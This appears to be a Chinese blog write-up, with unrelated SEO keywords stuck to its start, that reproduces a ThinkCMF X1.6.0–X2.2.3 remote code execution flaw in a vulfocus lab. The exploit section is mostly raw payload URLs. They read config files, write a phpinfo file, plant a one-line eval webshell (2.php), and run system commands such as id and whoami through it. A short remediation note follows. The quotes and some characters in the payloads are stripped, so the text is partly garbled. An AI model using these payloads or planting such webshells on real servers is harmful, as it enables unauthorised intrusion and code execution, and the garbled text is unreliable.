高级网站开发工程师证书,在社保网站做调动,上海专业网站建设,网上营销推广thinkcmf 文件包含 x1.6.0-x2.2.3 CVE-2019-16278 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 漏洞名称
漏洞描述
ThinkCMF是一款基于PHPMYSQL开发的中文内容管理框架#xff0c;底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制MYSQL开发的中文内容管理框架底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制框架自身提供基础的管理功能而开发者可以根据自身的需求以应用的形式进行扩展。
远程攻击者在无需任何权限情况下通过构造特定的请求包即可在远程服务器上执行任意代码。
影响版本
ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2
漏洞复现
环境搭建
受害者IP192.168.63.129:9390 攻击者IP192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git启动vulfocus
docker-compose up -d 环境启动后访问http://192.168.63.129:9390即可看到一个thinkphp页面说明已成功启动。
漏洞利用
直接干货不墨迹
/?adisplaytemplateFileREADME.md/?adisplaytemplateFileconfig.yaml写入phpinfo文件
?afetchtemplateFilepublic/indexprefixcontentphpfile_put_contents(1.php,?php phpinfo(); ?)/php访问1.php 写入一句话木马2.php
/?afetchtemplateFilepublic/indexprefixcontentphpfile_put_contents(2.php,?php eval($_GET[red]);?)/php访问2.php执行系统命令
/2.php?redsystem(ls /tmp);
/2.php?redsystem(id);
/2.php?redsystem(whoami);修复建议
将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected
总结